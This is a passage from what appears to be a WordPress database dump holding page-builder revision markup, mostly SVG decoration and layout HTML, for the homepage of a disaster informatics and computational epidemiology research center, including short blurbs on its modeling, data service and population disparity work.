d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n </svg>\n </div>\n <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-215 style-local-22-h27\">\n <!---->\n <!---->\n <h3 class=\"\">Center for Disaster Informatics & Computational Epidemiology</h3>\n </div>\n </div>\n <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Enabling Data-Driven Disaster Assessment & Planning\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\" data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 18:19:53','2022-02-16 18:19:53','',22,'https://gsudice.dataconn.net/?p=377',0,'revision','',0),(381,1,'2022-02-16 18:26:09','2022-02-16 18:26:09','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease & disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Computational modeling & spatially explicit Approaches to better understand how diseases and disasters affect places at local, regional, national, and global scales<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Data reconciliation, consolidation, and distribution to support research in disaster informatics, disease modeling, and spatial epidemiology<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"population disparities<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Enable the development of inclusive public health and disaster preparedness efforts that overcome place- and context-specific access disparities <\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 18:26:09','2022-02-16 18:26:09','',168,'https://gsudice.dataconn.net/?p=381',0,'revision','',0),(382,1,'2022-02-16 18:26:09','2022-02-16 18:26:09','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c6\">\n <!---->\n <!---->\n <h5 class=\"\">disease & disaster modeling</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computational modeling & spatially explicit Approaches to better understand how diseases and disasters affect places at local, regional, national, and global scales</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c10\">\n <!---->\n <!---->\n <h5 class=\"\">data as a service</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Data reconciliation, consolidation, and distribution to support research in disaster informatics, disease modeling, and spatial epidemiology</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n 